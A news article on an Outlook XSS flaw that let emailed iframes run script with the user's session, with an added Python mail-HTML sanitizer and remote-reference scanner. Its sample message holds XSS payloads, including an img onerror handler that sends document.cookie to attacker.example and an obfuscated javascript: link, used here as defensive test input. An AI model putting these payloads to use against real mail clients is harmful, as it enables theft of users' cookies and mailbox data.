One of the researchers who discovered the problem was F5 Networks specialist Bryan Appleby. He has now published details of the vulnerability along with a working PoC exploit for it.
Appleby said he discovered the bug by chance while sharing JavaScript code with friends over email. The root cause was the way Outlook parsed the HTML of an incoming message, which let an attacker embed an iframe in a message the victim receives.
JavaScript running inside such an iframe executed in the context of the logged-in Outlook user, so it could read application content such as cookies, tokens and even the contents of the mailbox.

“The ability to embed an iframe into an email is already a vulnerability. Even worse, the iframe was not affected by the block external images setting that prevents tracking pixels and web beacons. But if an attacker could gain the ability to run JavaScript in an email, there could be a much more dangerous attack vector,” said Bryan Appleby.
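The two problems the article describes, an iframe that survives HTML rendering and a "block external images" setting that only looks at images, are both decided by what a mail client keeps when it rebuilds a message body. The Python below is added here as an illustration; it is not code from Appleby, F5 or Microsoft, and it uses only the standard library. It shows an allow-list sanitizer that drops scripts, frames and plugins with their content, strips event-handler attributes and non-http/mailto/cid URLs (including javascript: URLs padded with control characters), and optionally blocks every remote src, together with a scanner that inventories every attribute that would cause a fetch at render time, not just `<img src>`. The sample message is constructed for the example.

```python
"""Allow-list HTML sanitizer for a mail client, plus an inventory of remote
content references. Added illustration, not any vendor's code."""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Elements whose tag AND content are discarded: scripts, frames and plugins
# have no place in an e-mail body.
DROP_WITH_CONTENT = {"script", "style", "iframe", "frame", "frameset",
                     "object", "embed", "applet", "svg", "math", "template"}
ALLOWED_TAGS = {"a", "b", "i", "u", "em", "strong", "p", "br", "div", "span",
                "ul", "ol", "li", "table", "tbody", "tr", "td", "th", "img",
                "h1", "h2", "h3", "h4", "h5", "h6", "blockquote", "pre", "code"}
VOID_TAGS = {"br", "img"}
ALLOWED_ATTRS = {"href", "src", "alt", "title", "width", "height", "colspan", "rowspan"}
SAFE_SCHEMES = {"href": {"http", "https", "mailto"}, "src": {"http", "https", "cid"}}
# (tag, attribute) pairs that make a client fetch something when rendering.
# A "block external images" feature that only covers ("img", "src") misses the rest.
FETCHING_ATTRS = {("img", "src"), ("iframe", "src"), ("frame", "src"),
                  ("object", "data"), ("embed", "src"), ("input", "src"),
                  ("video", "poster"), ("video", "src"), ("audio", "src"),
                  ("link", "href"), ("source", "src"), ("track", "src")}
_CTRL = re.compile(r"[\x00-\x20]")


def url_scheme(value):
    """Scheme of a URL after removing control chars and spaces that browsers
    ignore, so 'java\\nscript:' is still recognised as javascript:."""
    return urlparse(_CTRL.sub("", value or "")).scheme.lower()


class RemoteRefScanner(HTMLParser):
    """Collects every (tag, attr, url) that would trigger a network fetch."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name.lower()) in FETCHING_ATTRS and url_scheme(value) in {"http", "https"}:
                self.refs.append((tag, name.lower(), value))


def remote_references(html):
    scanner = RemoteRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.refs


class MailHtmlSanitizer(HTMLParser):
    """Rebuilds the body from an allow-list; everything else is dropped."""
    def __init__(self, block_remote=True):
        super().__init__(convert_charrefs=True)
        self.block_remote = block_remote
        self.out, self.open, self.dropped = [], [], []
        self._skip, self._skip_depth = None, 0   # element currently being discarded

    def handle_starttag(self, tag, attrs):
        if self._skip:
            if tag == self._skip:
                self._skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.dropped.append(f"<{tag}>")
            self._skip, self._skip_depth = tag, 1
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")      # tag dropped, its text is kept
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on") or name not in ALLOWED_ATTRS:
                self.dropped.append(f"<{tag} {name}>")
                continue
            if name in SAFE_SCHEMES:
                scheme = url_scheme(value)
                if scheme not in SAFE_SCHEMES[name]:
                    self.dropped.append(f"<{tag} {name}={scheme or 'relative'}:>")
                    continue
                if self.block_remote and name == "src" and scheme in {"http", "https"}:
                    self.dropped.append(f"<{tag} src=remote>")
                    continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if self._skip:
            if tag == self._skip:
                self._skip_depth -= 1
                if self._skip_depth == 0:
                    self._skip = None
            return
        if tag in self.open:                      # close up to and including this tag
            while True:
                top = self.open.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()
        while self.open:                          # balance anything left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize_mail_html(html, block_remote=True):
    """Returns (clean_html, list_of_dropped_items)."""
    s = MailHtmlSanitizer(block_remote)
    s.feed(html)
    return s.result(), s.dropped


# Constructed sample message in the shape the article describes: an iframe
# carrying script, a remote image with an event handler, a disguised javascript: link.
SAMPLE_MAIL = (
    '<div>Hi, here is the code I mentioned.'
    '<iframe src="https://attacker.example/frame.html"><script>alert(1)</script></iframe>'
    '<img src="https://attacker.example/beacon.gif" '
    'onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
    '<a href="java\nscript:alert(document.cookie)">click</a>'
    '<a href="https://example.com/">safe link</a></div>'
)

if __name__ == "__main__":
    clean, dropped = sanitize_mail_html(SAMPLE_MAIL)
    print(clean)
    print("dropped:", dropped)
    print("would fetch:", remote_references(SAMPLE_MAIL))
```

The scanner is the part to compare against a client's "block external content" switch: if it only intercepts `<img src>`, every other entry the scanner reports is a beacon that still fires.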
Appleby reported the bug to Microsoft in December 2018, but the vulnerability was only confirmed in March 2019, after he supplied the developers with a PoC exploit. Microsoft fixed the problem only this month, more than six months after it was discovered.
Appleby was not the only researcher who noticed the dangerous XSS in Outlook: The Hacker News published a video demonstrating the vulnerability in action, provided by independent security researcher Gaurav Kumar, who also found the bug and reported it to Microsoft.
Source: https://www.f5.com